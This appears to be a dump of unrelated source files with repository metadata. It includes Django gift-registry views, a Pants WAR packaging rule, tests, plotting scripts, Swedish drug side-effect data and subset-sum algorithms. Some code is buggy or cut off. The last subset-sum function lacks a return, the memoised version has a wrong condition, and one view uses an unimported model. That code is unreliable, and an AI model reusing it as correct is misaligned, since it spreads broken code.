from project.apps.tables.forms import EventForm, BuyGiftForm
from project.apps.tables.models import Table, TableGift
from project.core.mixins import RequestFormMixin
class EventView(RequestFormMixin, FormView):
template_name = 'events/create.html'
form_class = EventForm
success_url = reverse_lazy('gifts:gifts')
def form_valid(self, form):
form.save()
return super(EventView, self).form_valid(form)
class TableDeleteView(DeleteView):
model = Table
template_name = 'tables/delete.html'
success_url = reverse_lazy('users:profile')
def get_object(self, queryset=None):
""" Hook to ensure object is owned by request.user. """
obj = super(TableDeleteView, self).get_object()
if not obj.user == self.request.user:
raise Http404
return obj
class TableUpdate(RequestFormMixin, UpdateView):
template_name = 'tables/update.html'
form_class = EventForm
success_url = reverse_lazy('users:profile')
pk_url_kwarg = 'pk'
def get_object(self, queryset=None):
pk = self.kwargs.get('pk')
obj = Table.objects.get(pk=pk)
if not obj.user == self.request.user:
raise Http404
return obj
class TableDetailView(TemplateView):
template_name = 'tables/detail.html'
def get_context_data(self, **kwargs):
context = super(TableDetailView, self).get_context_data(**kwargs)
pk = kwargs.get('pk')
obj = Table.objects.get(pk=pk)
if not obj.user == self.request.user:
raise Http404
gifts = TableGift.objects.filter(table=obj)
context['table'] = obj
context['gifts'] = gifts
return context
class SelectGiftView(View):
def get_context_data(self, **kwargs):
pk = kwargs.get('pk')
table = Table.objects.get(pk=pk)
gifts = TableGift.objects.filter(table=table)
context = {
'table': table,
'gifts': gifts
}
return context
def get(self, request, **kwargs):
context = self.get_context_data(**kwargs)
return TemplateResponse(request, 'tables/select.html', context)
class BuyGiftView(View):
def get_context_data(self, **kwargs):
table = Table.objects.get(pk=kwargs.get('pk'))
gift = Gift.objects.get(pk=kwargs.get('id'))
form = BuyGiftForm()
context = {
'table': table,
'gift': gift,
'form': form,
}
return context
def get(self, request, **kwargs):
context = self.get_context_data(**kwargs)
return TemplateResponse(request, 'tables/buy.html', context)
def post(self, request, **kwargs):
context = self.get_context_data(**kwargs)
buy_gift_form = BuyGiftForm(
request.POST,
request=request,
table=context['table'],
gift=context['gift'],
)
if buy_gift_form.is_valid():
buy_gift_form.save()
messages.info(request, "Felicidades, la compra fue completada con exito")
return redirect(reverse_lazy('tables:select_gift', kwargs={'pk': kwargs.get('pk')}))
context['form'] = buy_gift_form
return TemplateResponse(request, 'tables/buy.html', context)
|
[
"[email protected]"
] | |
5f1ebaaf134e28a2cce175fab00ab1e2933603c3
|
5db0fab37c2b8a618d85d3b60fab9f806c416474
|
/src/python/pants/jvm/package/war.py
|
31c96a849f1c243e7a90c996c3d22ed4cd110ea1
|
[
"Apache-2.0"
] |
permissive
|
pantsbuild/pants
|
4988d1ac5474ec95f94ce2218aeb759401e4b011
|
98cbda8545f0d58c586ed2daa76fefd729d5e0d5
|
refs/heads/main
| 2023-09-05T03:44:17.646899 | 2023-09-01T19:52:09 | 2023-09-01T19:52:09 | 7,209,075 | 2,708 | 593 |
Apache-2.0
| 2023-09-14T19:33:33 | 2012-12-17T17:39:04 |
Python
|
UTF-8
|
Python
| false | false | 7,675 |
py
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import logging
import textwrap
from dataclasses import dataclass
from pathlib import PurePath
from typing import Iterable
from pants.build_graph.address import Address
from pants.core.goals.package import (
BuiltPackage,
BuiltPackageArtifact,
OutputPathField,
PackageFieldSet,
)
from pants.core.target_types import FileSourceField, ResourceSourceField
from pants.core.util_rules.source_files import SourceFiles, SourceFilesRequest
from pants.core.util_rules.system_binaries import BashBinary, ZipBinary
from pants.engine.addresses import Addresses, UnparsedAddressInputs
from pants.engine.fs import (
EMPTY_DIGEST,
AddPrefix,
CreateDigest,
Digest,
DigestEntries,
DigestSubset,
Directory,
FileContent,
FileEntry,
MergeDigests,
PathGlobs,
)
from pants.engine.internals.selectors import MultiGet
from pants.engine.process import Process, ProcessResult
from pants.engine.rules import Get, collect_rules, rule
from pants.engine.target import (
DependenciesRequest,
HydratedSources,
HydrateSourcesRequest,
SourcesField,
Targets,
)
from pants.engine.unions import UnionRule
from pants.jvm.classpath import Classpath
from pants.jvm.shading.rules import ShadedJar, ShadeJarRequest
from pants.jvm.target_types import (
JvmShadingRule,
JvmWarContentField,
JvmWarDependenciesField,
JvmWarDescriptorAddressField,
JvmWarShadingRulesField,
)
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class PackageWarFileFieldSet(PackageFieldSet):
required_fields = (
JvmWarDependenciesField,
JvmWarDescriptorAddressField,
)
output_path: OutputPathField
dependencies: JvmWarDependenciesField
descriptor: JvmWarDescriptorAddressField
content: JvmWarContentField
shading_rules: JvmWarShadingRulesField
@dataclass(frozen=True)
class RenderWarDeploymentDescriptorRequest:
descriptor: JvmWarDescriptorAddressField
owning_address: Address
@dataclass(frozen=True)
class RenderedWarDeploymentDescriptor:
digest: Digest
@dataclass(frozen=True)
class RenderWarContentRequest:
content: JvmWarContentField
@dataclass(frozen=True)
class RenderedWarContent:
digest: Digest
async def _apply_shading_rules_to_classpath(
classpath: Classpath, shading_rules: Iterable[JvmShadingRule] | None
) -> Digest:
input_digest = await Get(Digest, MergeDigests(classpath.digests()))
if not shading_rules:
return input_digest
jars_digest = await Get(Digest, DigestSubset(input_digest, PathGlobs(["**/*.jar"])))
digest_entries = await Get(DigestEntries, Digest, jars_digest)
jar_entries = [entry for entry in digest_entries if isinstance(entry, FileEntry)]
if len(jar_entries) == 0:
return EMPTY_DIGEST
jar_digests = await MultiGet(Get(Digest, CreateDigest([entry])) for entry in jar_entries)
shaded_jars = await MultiGet(
Get(ShadedJar, ShadeJarRequest(path=entry.path, digest=digest, rules=shading_rules))
for entry, digest in zip(jar_entries, jar_digests)
)
return await Get(Digest, MergeDigests([shaded.digest for shaded in shaded_jars]))
@rule
async def package_war(
field_set: PackageWarFileFieldSet,
bash: BashBinary,
zip: ZipBinary,
) -> BuiltPackage:
classpath = await Get(Classpath, DependenciesRequest(field_set.dependencies))
all_jar_files_digest = await _apply_shading_rules_to_classpath(
classpath, field_set.shading_rules.value
)
prefixed_jars_digest, content, descriptor, input_setup_digest = await MultiGet(
Get(Digest, AddPrefix(all_jar_files_digest, "__war__/WEB-INF/lib")),
Get(RenderedWarContent, RenderWarContentRequest(field_set.content)),
Get(
RenderedWarDeploymentDescriptor,
RenderWarDeploymentDescriptorRequest(field_set.descriptor, field_set.address),
),
Get(
Digest,
CreateDigest(
[
FileContent(
"make_war.sh",
textwrap.dedent(
f"""\
cd __war__
{zip.path} ../output.war -r .
"""
).encode(),
is_executable=True,
),
Directory("__war__/WEB-INF/classes"),
Directory("__war__/WEB-INF/lib"),
]
),
),
)
input_digest = await Get(
Digest,
MergeDigests(
[
prefixed_jars_digest,
descriptor.digest,
content.digest,
input_setup_digest,
]
),
)
result = await Get(
ProcessResult,
Process(
[bash.path, "make_war.sh"],
input_digest=input_digest,
output_files=("output.war",),
description=f"Assemble WAR file for {field_set.address}",
),
)
output_entries = await Get(DigestEntries, Digest, result.output_digest)
if len(output_entries) != 1:
raise AssertionError("No output from war assembly step.")
output_entry = output_entries[0]
if not isinstance(output_entry, FileEntry):
raise AssertionError("Unexpected digest entry")
output_filename = PurePath(field_set.output_path.value_or_default(file_ending="war"))
package_digest = await Get(
Digest, CreateDigest([FileEntry(str(output_filename), output_entry.file_digest)])
)
artifact = BuiltPackageArtifact(relpath=str(output_filename))
return BuiltPackage(digest=package_digest, artifacts=(artifact,))
@rule
async def render_war_deployment_descriptor(
request: RenderWarDeploymentDescriptorRequest,
) -> RenderedWarDeploymentDescriptor:
descriptor_sources = await Get(
HydratedSources,
HydrateSourcesRequest(request.descriptor),
)
descriptor_sources_entries = await Get(
DigestEntries, Digest, descriptor_sources.snapshot.digest
)
if len(descriptor_sources_entries) != 1:
raise AssertionError(
f"Expected `descriptor` field for {request.descriptor.address} to only refer to one file."
)
descriptor_entry = descriptor_sources_entries[0]
if not isinstance(descriptor_entry, FileEntry):
raise AssertionError(
f"Expected `descriptor` field for {request.descriptor.address} to produce a file."
)
descriptor_digest = await Get(
Digest,
CreateDigest([FileEntry("__war__/WEB-INF/web.xml", descriptor_entry.file_digest)]),
)
return RenderedWarDeploymentDescriptor(descriptor_digest)
@rule
async def render_war_content(request: RenderWarContentRequest) -> RenderedWarContent:
addresses = await Get(
Addresses, UnparsedAddressInputs, request.content.to_unparsed_address_inputs()
)
targets = await Get(Targets, Addresses, addresses)
sources = await Get(
SourceFiles,
SourceFilesRequest(
[tgt[SourcesField] for tgt in targets if tgt.has_field(SourcesField)],
for_sources_types=(ResourceSourceField, FileSourceField),
enable_codegen=True,
),
)
digest = await Get(Digest, AddPrefix(sources.snapshot.digest, "__war__"))
return RenderedWarContent(digest)
def rules():
return (
*collect_rules(),
UnionRule(PackageFieldSet, PackageWarFileFieldSet),
)
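# Sketch of a BUILD target these rules would package (target and field names
# assumed from the imported JvmWar* fields, not verified against pants docs):
#   jvm_war(
#       name="web",
#       descriptor=":web_xml",
#       content=[":static_assets"],
#       dependencies=[":servlet_lib"],
#   )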
|
[
"[email protected]"
] | |
fe2f7f2530cf752e62798071f21f4b0661893d06
|
15a992391375efd487b6442daf4e9dd963167379
|
/tests/test_simulatedelay.py
|
3a0507dae745ed25ed225fcb317707121dba18bb
|
[
"Apache-2.0"
] |
permissive
|
Bala93/MONAI
|
b0e68e1b513adcd20eab5158d4a0e5c56347a2cd
|
e0a7eff5066da307a73df9145077f6f1fec7a514
|
refs/heads/master
| 2022-08-22T18:01:25.892982 | 2022-08-12T18:13:53 | 2022-08-12T18:13:53 | 259,398,958 | 2 | 0 | null | 2020-04-27T17:09:12 | 2020-04-27T17:09:11 | null |
UTF-8
|
Python
| false | false | 1,251 |
py
|
# Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import unittest
import numpy as np
from parameterized import parameterized
from monai.transforms.utility.array import SimulateDelay
from tests.utils import NumpyImageTestCase2D
class TestSimulateDelay(NumpyImageTestCase2D):
@parameterized.expand([(0.45,), (1,)])
def test_value(self, delay_test_time: float):
resize = SimulateDelay(delay_time=delay_test_time)
start: float = time.time()
_ = resize(self.imt[0])
stop: float = time.time()
measured_approximate: float = stop - start
np.testing.assert_allclose(delay_test_time, measured_approximate, rtol=0.5)
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
03d4ba232b4d34b7e9a72471e1ff44e5c604831f
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/man_and_new_group/different_group_or_little_hand.py
|
152d6b704e1cb5dd4be2d6ff23ee40a673ea85fe
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162 | 2016-08-19T07:20:12 | 2016-08-19T07:20:12 | 60,834,519 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 207 |
py
|
#! /usr/bin/env python
def company(str_arg):
day_and_small_way(str_arg)
print('get_new_fact')
def day_and_small_way(str_arg):
print(str_arg)
if __name__ == '__main__':
company('company')
|
[
"[email protected]"
] | |
45c62288d5d20727fe79c75003386cfc2e2e82e3
|
0e5658deaa630a603a7134847518408c09e3a6d0
|
/vendor/riffyn-sdk/test/test_groups.py
|
3978a7552a12b93bca07b271cda5e70fcf6ab897
|
[] |
no_license
|
jace-ys/lab-automation
|
cb0d0d2b88ec64e235cffca8bbf556b22c55ab1e
|
27be3a942b111404844f29aa9a0dd957b7fde459
|
refs/heads/master
| 2023-06-01T20:30:55.557975 | 2021-06-16T07:46:20 | 2021-06-16T08:15:38 | 297,329,484 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,565 |
py
|
# coding: utf-8
"""
Riffyn Nexus REST API V1
## Vocabulary Before you begin, please familiarize yourself with our [Glossary of Terms](https://help.riffyn.com/hc/en-us/articles/360045503694). ## Getting Started If you'd like to play around with the API, there are several free GUI tools that will allow you to send requests and receive responses. We suggest using the free app [Postman](https://www.getpostman.com/). ## Authentication Begin with a call the [authenticate](#/authentication/authenticate) endpoint using [HTTP Basic authentication](https://en.wikipedia.org/wiki/Basic_access_authentication) with your `username` and `password` to retrieve either an API Key or an Access Token. For example: curl -X POST -u '<username>' https://api.app.riffyn.com/v1/auth -v You may then use either the API Key or the accessToken for all future requests to the API. For example: curl -H 'access-token: <ACCESS_TOKEN>' https://api.app.riffyn.com/v1/units -v curl -H 'api-key: <API_KEY>' https://api.app.riffyn.com/v1/units -v The tokens' values will be either in the message returned by the `/authenticate` endpoint or in the createApiKey `/auth/api-key` or CreateAccesToken `/auth/access-token` endpoints. The API Key will remain valid until it is deauthorized by revoking it through the Security Settings in the Riffyn Nexus App UI. The API Key is best for running scripts and longer lasting interactions with the API. The Access Token will expire automatically and is best suited to granting applications short term access to the Riffyn Nexus API. Make your requests by sending the HTTP header `api-key: $API_KEY`, or `access-token: $ACCESS_TOKEN`. In Postman, add your preferred token to the headers under the Headers tab for any request other than the original request to `/authenticate`. If you are enrolled in MultiFactor Authentication (MFA) the `status` returned by the `/authenticate` endpoint will be `MFA_REQUIRED`. A `passCode`, a `stateToken`, and a `factorId` must be passed to the [/verify](#/authentication/verify) endpoint to complete the authentication process and achieve the `SUCCESS` status. MFA must be managed in the Riffyn Nexus App UI. ## Paging and Sorting The majority of endpoints that return a list of data support paging and sorting through the use of three properties, `limit`, `offset`, and `sort`. Please see the list of query parameters, displayed below each endpoint's code examples, to see if paging or sorting is supported for that specific endpoint. Certain endpoints return data that's added frequently, like resources. As a result, you may want filter results on either the maximum or minimum creation timestamp. This will prevent rows from shifting their position from the top of the list, as you scroll though subsequent pages of a multi-page response. Before querying for the first page, store the current date-time (in memory, a database, a file...). On subsequent pages you *may* include the `before` query parameter, to limit the results to records created before that date-time. E.g. before loading page one, you store the current date time of `2016-10-31T22:00:00Z` (ISO date format). Later, when generating the URL for page two, you *could* limit the results by including the query parameter `before=1477951200000` (epoch timestamp). ## Postman endpoint examples There is a YAML file with the examples of the request on Riffyn Nexus API [Click here](/v1/collection) to get the file. If you don't know how to import the collection file, [here](https://learning.postman.com/docs/postman/collections/data-formats/#importing-postman-data) are the steps. 
## Client SDKs You may write your own API client, or you may use one of ours. [Click here](/v1/clients) to select your programming language and download an API client. # noqa: E501
OpenAPI spec version: 4.2.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import riffyn_nexus_sdk_v1
from riffyn_nexus_sdk_v1.models.groups import Groups # noqa: E501
from riffyn_nexus_sdk_v1.rest import ApiException
class TestGroups(unittest.TestCase):
"""Groups unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGroups(self):
"""Test Groups"""
# FIXME: construct object with mandatory attributes with example values
# model = riffyn_nexus_sdk_v1.models.groups.Groups() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
ad9064e708a629da144f757f5219de9f0fe28990
|
81e6391b9db249296ec84f6524093cf41b581f31
|
/단계별로 풀어보기/18. 큐, 덱/[11866] 요세푸스 문제 0.py
|
036703aae87a0030be4e80cef574bbad953c51d2
|
[] |
no_license
|
jaeehooon/baekjoon_python
|
e991be4b510d642f72f625b898d20451dc920d7c
|
295776309a883338bfbf51c33caf6dc6629493ca
|
refs/heads/master
| 2023-04-15T14:22:21.281930 | 2021-04-26T02:15:09 | 2021-04-26T02:15:09 | 294,137,750 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 580 |
py
|
import sys
from collections import deque
class MyDeque(object):
def __init__(self, size):
self.dq = deque(i for i in range(1, size + 1))
def remove(self, kth):
for _ in range(kth - 1):
self.dq.append(self.dq.popleft())
return self.dq.popleft()
def size(self):
return len(self.dq)
if __name__ == '__main__':
N, K = map(int, sys.stdin.readline().split())
result = list()
dq = MyDeque(N)
while dq.size() != 0:
result.append(dq.remove(K))
print(str(result).replace("[", '<').replace("]", ">"))
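    # For reference: N=7, K=3 yields <3, 6, 2, 7, 5, 1, 4>.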
|
[
"[email protected]"
] | |
d4d9d009198e4aa20e9f0cf82447cf8d32471e26
|
0fe11fbe31be719a253c0b2d9e41e20fedc2c40f
|
/dapper/mods/LorenzUV/illust_LorenzUV.py
|
212f07e00e12c2a3c7334ea3bcc7de4151b5083c
|
[
"MIT"
] |
permissive
|
lijunde/DAPPER
|
148ff5cefb92d1bb01c78bd4a82a6f1ecdebdad2
|
dc92a7339932af059967bd9cf0a473ae9b8d7bf9
|
refs/heads/master
| 2020-12-10T21:44:54.468785 | 2019-09-24T18:18:36 | 2019-09-24T18:18:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,078 |
py
|
# Quick illustration.
# Sorry for the mess.
from dapper import *
from matplotlib import cm
# Setup
sd0 = seed(4)
# from dapper.mods.LorenzUV.wilks05 import LUV
from dapper.mods.LorenzUV.lorenz95 import LUV
nU, J = LUV.nU, LUV.J
dt = 0.005
t0 = np.nan
K = int(10/dt)
step_1 = with_rk4(LUV.dxdt,autonom=True)
step_K = with_recursion(step_1,prog=1)
x0 = 0.01*randn(LUV.M)
x0 = step_K(x0,int(2/dt),t0,dt)[-1] # BurnIn
xx = step_K(x0,K ,t0,dt)
# Grab parts of state vector
ii = arange(nU+1)
jj = arange(nU*J+1)
circU = np.mod(ii ,nU)
circV = np.mod(jj,nU*J) + nU
iU = np.hstack([0, 0.5+arange(nU), nU])
def Ui(xx):
interp = (xx[0]+xx[-1])/2
return np.hstack([interp, xx, interp])
# Overlay linear
fg = plt.figure(2)
fg.clear()
ax = fg.gca()
L = 20 # Num of lines to plot
start = int(3e5*dt)
step = 3
for i,Ny in enumerate(range(L)):
k = start + Ny*step
c = cm.viridis(1-Ny/L)
a = 0.8-0.2*Ny/L
plt.plot(iU ,Ui(xx[k][:nU]),color=c,lw=2 ,alpha=a)[0]
if i%2==0:
plt.plot(jj/J,xx[k][circV] ,color=c,lw=0.7,alpha=a)[0]
# Make ticks, ticklabels, grid
ax.set_xticks([])
ym,yM = -4,10
ax.set_ylim(ym,yM)
ax.set_xlim(0,nU)
dY = 4 # SET TO: 1 for wilks05, 4 for lorenz95
# U-vars: major
tU = iU[1:-1]
lU = np.array([str(i+1) for i in range(nU)])
tU = ccat(tU[0],tU[dY-1::dY])
lU = ccat(lU[0],lU[dY-1::dY])
for t, l in zip(tU,lU):
ax.text(t,ym-.6,l,fontsize=mpl.rcParams['xtick.labelsize'],horizontalalignment='center')
ax.vlines(t, ym, -3.78, 'k',lw=mpl.rcParams['xtick.major.width'])
# V-vars: minor
tV = arange(nU+1)
lV = ['1'] + [str((i+1)*J) for i in circU]
for i, (t, l) in enumerate(zip(tV,lV)):
if i%dY==0:
ax.text(t,-5.0,l,fontsize=9,horizontalalignment='center')
ax.vlines(t,ym,yM,lw=0.3)
ax.vlines(t, ym, -3.9, 'k',lw=mpl.rcParams['xtick.minor.width'])
ax.grid(color='k',alpha=0.6,lw=0.4,axis='y',which='major')
# # Convert to circular coordinates
# # Should have used instead: projection='polar'
# def tU(zz):
# xx = (40 + 3*zz)*cos(2*pi*ii/nU)
# yy = (40 + 3*zz)*sin(2*pi*ii/nU)
# return xx,yy
# def tV(zz):
# xx = (80 + 15*zz)*cos(2*pi*jj/nU/J)
# yy = (80 + 15*zz)*sin(2*pi*jj/nU/J)
# return xx,yy
#
#
# # Animate circ
# plt.figure(3)
# lhU = plt.plot(*tU(xx[-1][circU]),'b',lw=3)[0]
# lhV = plt.plot(*tV(xx[-1][circV]),'g',lw=1)[0]
# for k in progbar(range(K),'Plotting'):
# dataU = tU(xx[k][circU])
# dataV = tV(xx[k][circV])
# lhU.set_xdata(dataU[0])
# lhU.set_ydata(dataU[1])
# lhV.set_xdata(dataV[0])
# lhV.set_ydata(dataV[1])
# plt.pause(0.001)
#
#
# # Overlay circ
# from matplotlib import cm
# fg = plt.figure(4)
# fg.clear()
# plt.plot(*tU(4.52*np.ones_like(circU)),color='k',lw=1)[0]
# plt.plot(*tV(0.15*np.ones_like(circV)),color='k',lw=1)[0]
# ax = fg.axes[0]
# ax.set_axis_off()
# ax.set_facecolor('white')
# ax.set_aspect('equal')
# L = 40 # Num of lines to plot
# for Ny in range(L):
# k = 143 + Ny*3
# c = cm.viridis(1-Ny/L)
# a = 0.8-0.2*Ny/L
# plt.plot(*tU(xx[k][circU]),color=c,lw=2,alpha=a)[0]
# plt.plot(*tV(xx[k][circV]),color=c,lw=1,alpha=a)[0]
|
[
"[email protected]"
] | |
ebc47b77e7121455d0580d51a74c276f7501266c
|
3e19be3527431ba4949f1dc868158cf4f3ea92c5
|
/rps_game/round.py
|
c5d4208b7de5bd1e5d4c006026c56fe26f079cca
|
[] |
no_license
|
aldotele/rock_paper_scissors
|
f61626ba941181c0568045448686e5d14c11d9bb
|
6562cd15921d6736705c6490f1614f7335f9c38e
|
refs/heads/main
| 2023-06-13T00:43:10.425229 | 2021-07-06T09:40:15 | 2021-07-06T09:40:15 | 382,092,277 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 902 |
py
|
class Round:
choices = {1: "Rock", 2: "Paper", 3: "Scissors"}
def __init__(self, player_1_choice, player_2_choice):
if Round.is_choice_valid(player_1_choice) and Round.is_choice_valid(player_2_choice):
self.player_1_choice = int(player_1_choice)
self.player_2_choice = int(player_2_choice)
self.winner = ""
else:
raise ValueError("choice must be an integer between 1 and 3")
@staticmethod
def is_choice_valid(choice_code):
try:
choice_code = int(choice_code)
if choice_code in Round.choices:
return True
else:
return False
except ValueError:
return False
@staticmethod
def show_options():
for code in Round.choices:
print(f"{code} - {Round.choices[code]}")
if __name__ == '__main__':
pass
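    # A minimal usage sketch (illustrative):
    #   Round.show_options()
    #   r = Round(1, 2)  # Rock vs. Paper; winner logic is not implemented here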
|
[
"[email protected]"
] | |
28113d33d023705405400f808d2b609e2b69010e
|
de6ee907b82f52833d8e492e56ffebbd90528eed
|
/core/migrations/0001_initial.py
|
c1e82cd59dd68136aab1fdb5e967541ef268f0d1
|
[] |
no_license
|
ffabiorj/portfolio
|
2c27e25f851790bef85912b07fb341111a117563
|
a253742227776ff4d4d2d343cb87eba9599577e2
|
refs/heads/master
| 2021-06-03T04:24:50.879948 | 2020-04-19T01:44:45 | 2020-04-19T01:44:45 | 125,946,998 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 668 |
py
|
# Generated by Django 3.0.5 on 2020-04-16 23:46
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('description', models.TextField()),
('technology', models.CharField(max_length=20)),
('image', models.FilePathField(path='/img')),
],
),
]
|
[
"[email protected]"
] | |
a82a2b404fb48e9e88d3425db6cc1940f4624616
|
b39d9ef9175077ac6f03b66d97b073d85b6bc4d0
|
/Tygacil_WC500044508.py
|
7f23d111f63c0abada426f34c9a04781adb23398
|
[] |
no_license
|
urudaro/data-ue
|
2d840fdce8ba7e759b5551cb3ee277d046464fe0
|
176c57533b66754ee05a96a7429c3e610188e4aa
|
refs/heads/master
| 2021-01-22T12:02:16.931087 | 2013-07-16T14:05:41 | 2013-07-16T14:05:41 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,494 |
py
|
{'_data': [['Very common', [['GI', u'Illam\xe5ende, kr\xe4kningar, diarr\xe9']]],
['Common',
[['Infections', u'Pneumoni, abscess, infektioner'],
['Blood',
u'F\xf6rl\xe4ngd aktiverad partiell tromboplastintid (aPTT), f\xf6rl\xe4ngd protrombintid (PT)'],
['Metabolism', u'Hypoglykemi'],
['Nervous system', u'Yrsel'],
['Vascular', u'Flebit'],
['GI', u'Abdominell sm\xe4rta, dyspepsi, anorexi'],
['Hepato',
u'F\xf6rh\xf6jt aspartataminotransferas (ASAT) i serum, och f\xf6rh\xf6jt alaninaminotransferas (ALAT) i serum, hyperbilirubinemi'],
['Skin', u'Kl\xe5da, utslag'],
['General', u'Huvudv\xe4rk, f\xf6rs\xe4mrad l\xe4kning'],
['Investigations',
u'F\xf6rh\xf6jt serumamylas, f\xf6rh\xf6jda v\xe4rden av urin\xe4mne i blod (BUN) c. Beskrivning av ett urval biverkningar Generella antibiotikabiverkningar (klasseffekter): Pseudomembran\xf6s kolit, som kan variera i sv\xe5righetsgrad fr\xe5n mild till livshotande (se avsnitt 4.4). \xd6verv\xe4xt av icke-k\xe4nsliga organismer inklusive svamp (se avsnitt 4.4) Generella tetracyklinbiverkningar (klasseffekter): Antibiotika av klassen glycylcykliner \xe4r strukturellt likartade antibiotika i tetracyklinklassen. Biverkningar f\xf6r antibiotika tillh\xf6rande tetracyklinklassen kan inkludera ljusk\xe4nslighet, cerebral pseudotum\xf6r, pankreatit och anti-anabola effekter som kan leda till \xf6kad BUN (m\xe4ngden urin\xe4mne i blod), azotemi, acidos och hyperfosfatemi (se avsnitt 4.4). Tigecyklin kan eventuellt orsaka permanent missf\xe4rgning av t\xe4nder vid anv\xe4ndning under tandutvecklingen (se avsnitt 4.4). I kliniska fas 3-studier rapporterades infektionsrelaterade biverkningar oftare hos patienter som behandlades med tigecyklin (6,7 %) j\xe4mf\xf6rt med kontrollgruppen (4,6 %). Signifikanta skillnader avseende sepsis/septisk chock med tigecyklin (1,5 %) j\xe4mf\xf6rt med kontrollgruppen (0,5 %) observerades. Avvikelser i ASAT och ALAT hos Tygacil-behandlade patienter rapporterades oftare under tiden efter behandlingen \xe4n hos kontrollgruppen, d\xe4r dessa oftare f\xf6rekom under behandlingen. I alla fas 3 och fas 4\u2013studier (med komplicerade hud- och mjukdelsinfektioner samt komplicerade intraabdominala infektioner) f\xf6rekom d\xf6dsfall hos 2,4 % (54/2216) av patienterna som f\xe5tt tigecyklin och 1,7 % (37/2206) av patienterna som f\xe5tt j\xe4mf\xf6rande l\xe4kemedel.']]],
['Uncommon',
[['Infections', u'Sepsis, septisk chock'],
['Blood', u'Trombocytopeni, f\xf6rh\xf6jt International Normalised Ratio (INR)'],
['Metabolism', u'Hypoproteinemi'],
['Vascular', u'Tromboflebit'],
['GI', u'Akut pankreatit (se avsnitt 4.4)'],
['Hepato', u'Ikterus, leverskada mestadels kolestatisk'],
['General',
u'Reaktioner vid injektionsst\xe4llet, inflammation vid injektionsst\xe4llet, sm\xe4rta vid injektionsst\xe4llet, \xf6dem vid injektionsst\xe4llet, flebit vid injektionsst\xe4llet']]],
['Unknown',
[['Immune system',
u'Anafylaktiska/anafylaktoida reaktioner (se avsnitt 4.3 och 4.4)'],
['Hepato', u'Leversvikt (se avsnitt 4,4)'],
['Skin', u'Allvarliga hudreaktioner, inkl. Steven-Johnsons syndrom']]]],
'_pages': [6, 7],
u'_rank': 21,
u'_type': u'LSFU'}
|
[
"[email protected]"
] | |
cea59f25724bc06eaf721cb450fe61b141a9c80d
|
c733e6b433914a8faba256c7853f5cf2cd39c62a
|
/Python/Leetcode Daily Practice/DP/combination_sum.py
|
6a9cf686a28a7a53a156eff82aed1ccf54c2b5a9
|
[] |
no_license
|
YaqianQi/Algorithm-and-Data-Structure
|
3016bebcc1f1356b6e5f3c3e588f3d46c276a805
|
2e1751263f484709102f7f2caf18776a004c8230
|
refs/heads/master
| 2021-10-27T16:29:18.409235 | 2021-10-14T13:57:36 | 2021-10-14T13:57:36 | 178,946,803 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,304 |
py
|
"""
Input: {1, 2, 3, 7}, S=6
Output: True
The given set has a subset whose sum is '6': {1, 2, 3}
"""
# brute-force
# top-down with memo
# bottom up
def combination_sum_brute_force(num, sum_val):
# o(2**n)
def dfs(idx, sum_val):
if sum_val == 0:
return 1
if sum_val < 0 or idx >= len(num):
return -1
if num[idx] <= sum_val:
if dfs(idx + 1, sum_val - num[idx]) == 1:
return 1
return dfs(idx + 1, sum_val)
return dfs(0, sum_val)
def combination_sum_top_down_memo(num, sum_val):
# dp[num_idx][sum_val]
n = len(num)
dp = [[-1 for _ in range(sum_val+1)] for _ in range(n)]
def dfs(idx, sum_val):
if sum_val == 0:
return 1
if sum_val < 0 and idx >= len(num):
return -1
# print(idx, sum_val)
if dp[idx][sum_val] == -1:
if num[idx] <= sum_val:
if dfs(idx + 1, sum_val - num[idx]) == 1:
dp[idx][sum_val] = 1
return 1
else:
dp[idx][sum_val] = dfs(idx + 1, sum_val)
return dp[idx][sum_val]
return dfs(0, sum_val)
def combination_sum_bottom_up(num, sum_val):
# dp[num_idx][sum_val]
m = len(num)
n = sum_val + 1
dp = [[False for x in range(sum_val+1)] for y in range(len(num))]
# populate the sum = 0 columns, as we can always form '0' sum with an empty set
for i in range(0, len(num)):
dp[i][0] = True
# with only one number, we can form a subset only when the required sum is
# equal to its value
for s in range(1, sum_val+1):
dp[0][s] = True if num[0] == s else False
for i in range(1, m):
for j in range(1, n):
if dp[i-1][j]:
dp[i][j] = dp[i-1][j]
elif num[i] <= j:
dp[i][j] = dp[i-1][j - num[i]]
return dp[-1][-1]
def combination_sum_optimize_bottom_up(num, sum_val):
dp = [0] * (sum_val + 1)
dp[0] = 1
for i in range(len(num)):
        for j in range(sum_val, 0, -1):  # iterate downward so each number is used at most once
if dp[j]:
continue
elif num[i] <= j:
dp[j] = dp[j-num[i]]
